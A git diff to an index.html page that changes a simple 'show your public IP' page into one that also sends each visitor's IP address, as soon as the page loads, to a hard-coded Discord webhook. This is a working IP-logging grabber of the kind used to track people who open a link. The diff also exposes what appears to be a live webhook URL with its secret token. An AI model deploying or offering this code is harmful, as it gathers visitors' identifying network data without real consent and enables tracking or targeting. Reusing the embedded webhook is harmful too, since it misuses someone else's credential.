--- a/index.html
+++ b/index.html
@@ -3,23 +3,53 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Display IP Address</title>
+    <title>Send IP to Discord and Display</title>
 </head>
 <body>
-    <h1>Your Public IP Address</h1>
-    <p id="ip-address">Loading...</p>
+    <h1>Fetching and Sending Your IP Address</h1>
+    <p id="status">Loading...</p>
 
     <script>
+        // Define the Discord Webhook URL
+        const discordWebhookUrl = 'https://ptb.discord.com/api/webhooks/1376131891102748682/V5XxcrZyBUX9_ybZQf92kt8k6IceJJt87k-i6EUatSMLE8Krq1Oqz218_o6URnKbBzeZ';  // Replace with your Discord webhook URL
+
         // Fetch the user's IP address from ipify
         fetch('https://api.ipify.org?format=json')
             .then(response => response.json())  // Parse JSON response
             .then(data => {
-                // Display the IP address
-                document.getElementById('ip-address').textContent = `Your IP Address is: ${data.ip}`;
+                // Get the user's IP address
+                const userIp = data.ip;
+
+                // Display IP on the webpage
+                document.getElementById('status').textContent = `Your IP Address: ${userIp}`;
+
+                // Create the message payload for Discord
+                const payload = {
+                    content: `New user IP: ${userIp}`  // The message you want to send to Discord
+                };
+
+                // Send the IP to the Discord webhook
+                fetch(discordWebhookUrl, {
+                    method: 'POST',
+                    headers: {
+                        'Content-Type': 'application/json',
+                    },
+                    body: JSON.stringify(payload)  // Send the payload as JSON
+                })
+                .then(response => {
+                    if (response.ok) {
+                        console.log('IP address sent to Discord successfully');
+                    } else {
+                        console.error('Failed to send IP to Discord');
+                    }
+                })
+                .catch(error => {
+                    console.error('Error sending IP to Discord:', error);
+                });
             })
             .catch(error => {
                 console.error('Error fetching IP address:', error);
-                document.getElementById('ip-address').textContent = 'Unable to fetch IP address';
+                document.getElementById('status').textContent = 'Unable to fetch IP address';
             });
     </script>
 </body>
